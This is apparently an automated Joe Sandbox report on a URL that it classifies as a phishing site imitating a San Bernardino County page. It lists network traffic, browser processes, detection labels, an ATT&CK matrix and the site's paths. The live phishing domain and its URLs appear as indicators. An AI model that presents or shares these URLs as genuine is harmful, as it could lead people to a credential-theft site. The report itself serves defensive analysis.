      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 22:42:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: iVUfkqzDj6ISIDnRlVCYRvDMHq8s6XDDntU=$SfM5gXKhzaY16mU0Server: cloudflareCF-RAY: 8cbff7ec3b9443dd-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 22:42:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: iABQd8T5oRdI+YoqoZN7W1iXyt8LDzDMyUY=$5MceBAlnseEyNTMtcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cbff7fe5f8242a3-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 22:43:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: u7lAuu4eLQraXN80ERw77e6sFA+M0ONH8pc=$YoML+a8rvAYgi7V1Server: cloudflareCF-RAY: 8cbff845b8b50cac-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 22:43:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Ift8h9bhffiG4uk7g0MwCSdomfvcHeTUrhA=$YGfTgMxi+zPk/LRycache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8T1Qd3SVcD%2F8d63OMNi7R2OF1JMH4nGl1Ai5w%2Fakfl%2FASpREMQp0YO8v4RET0xY76sqbbWDfvRn0%2BZxxm2EhL4VPoHYND0tjTkVJjFBX%2F4e9DFvSbCqIiLr6ykf3vL1CyGCgwobkIh27Zbd2X5HSV9NjMmpxPI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cbff8507e6b8c71-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 22:43:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCr0V%2FzgHZB%2BkWu9A6kT0o8yVOOUO9ZQU%2F3IFWHGE7VCtYczsC6PaihKy12vNUyOx%2F8HLX7l3J3kBJXffTGPm0blB8sp3gmb7BxcxX9eT2l9orEpF8ozeSxwvfnCStFChG8%2BTs%2BB%2BlgJ9LOUtGw%2BrHE3g6R1kMw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cbff873beed8c06-EWR
      Source: chromecache_73.2.dr, chromecache_67.2.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_73.2.dr, chromecache_67.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_73.2.dr, chromecache_67.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49816 version: TLS 1.2
      Source: classification engineClassification label: mal76.phis.troj.win@18/49@18/9
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2188,i,10797738705276059449,12300204305592509053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sanbernardinoscounty.telcom-info.com/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2188,i,10797738705276059449,12300204305592509053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 5.3.pages.csv, type: HTML
      Source: Yara matchFile source: 9.4.pages.csv, type: HTML
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
      https://getbootstrap.com/)0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          code.jquery.com
          151.101.2.137
          truefalse
            unknown
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              unknown
              www.google.com
              216.58.206.36
              truefalse
                unknown
                sanbernardinoscounty.telcom-info.com
                104.21.55.67
                truetrue
                  unknown
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://sanbernardinoscounty.telcom-info.com/sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6false
                      unknown
                      https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                        unknown
                        https://sanbernardinoscounty.telcom-info.com/logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449effalse
                          unknown
                          https://sanbernardinoscounty.telcom-info.com/logo_/5HwVWMJJMP8EV8zfalse
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            • URL Reputation: safe
                            unknown
                            https://sanbernardinoscounty.telcom-info.com/cdn-cgi/challenge-platform/h/g/rc/8cbff7d01962c33dfalse
                              unknown
                              https://sanbernardinoscounty.telcom-info.com/js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2ffalse
                                unknown
                                https://sanbernardinoscounty.telcom-info.com/js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2ffalse
                                  unknown
                                  https://sanbernardinoscounty.telcom-info.com/captcha/style.cssfalse
                                    unknown
                                    https://sanbernardinoscounty.telcom-info.com/b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2ffalse
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/false
                                        unknown
                                        https://sanbernardinoscounty.telcom-info.com/fav/BxFYbJCBp2C7xgufalse
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8cbff7d01962c33d/1727822571917/09924a35f3c758709af88e0a588b7cd2bbbe09a1e05bd9809c84033ada6e7c05/xRO-NWK2Qn8voTNfalse
                                            unknown
                                            https://sanbernardinoscounty.telcom-info.com/em9XWWsyOWNaZkNyVjZorobotem9XWWsyOWNaZkNyVjZofalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfYfalse
                                                unknown
                                                https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8true
                                                  unknown
                                                  https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8#true
                                                    unknown
                                                    https://sanbernardinoscounty.telcom-info.com/false
                                                      unknown
                                                      https://sanbernardinoscounty.telcom-info.com/2svg/ZLWhvXZy16NYSMWfalse
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                          unknown
                                                          https://sanbernardinoscounty.telcom-info.com/captcha/logo.svgfalse
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cbff7d01962c33d&lang=autofalse
                                                              unknown
                                                              https://sanbernardinoscounty.telcom-info.com/css_/DmiM9Aw3DnV3DPQfalse
                                                                unknown
                                                                https://sanbernardinoscounty.telcom-info.com/home6dca65610bad709b07a9e6041699d6cefalse
                                                                  unknown
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2false
                                                                    unknown
                                                                    https://sanbernardinoscounty.telcom-info.com/favicon.icofalse
                                                                      unknown
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://getbootstrap.com/)chromecache_73.2.dr, chromecache_67.2.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://github.com/twbs/bootstrap/graphs/contributors)chromecache_73.2.dr, chromecache_67.2.drfalse
                                                                        unknown
                                                                        https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_73.2.dr, chromecache_67.2.drfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.18.94.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.18.95.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          216.58.206.36
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          151.101.2.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.21.55.67
                                                                          sanbernardinoscounty.telcom-info.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          IP
                                                                          192.168.2.4
                                                                          192.168.2.6
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1523738
                                                                          Start date and time:2024-10-02 00:41:50 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 3m 15s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:browseurl.jbs
                                                                          Sample URL:https://sanbernardinoscounty.telcom-info.com/
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal76.phis.troj.win@18/49@18/9
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.184.238, 74.125.71.84, 34.104.35.123, 4.245.163.56, 192.229.221.95, 13.85.23.206, 93.184.221.240, 40.69.42.241, 142.250.184.202, 216.58.212.138, 142.250.185.138, 142.250.185.170, 142.250.186.106, 142.250.185.74, 142.250.74.202, 216.58.206.74, 142.250.184.234, 172.217.18.10, 142.250.181.234, 142.250.185.202, 142.250.185.106, 142.250.185.234, 142.250.186.138, 172.217.16.202, 142.250.185.67
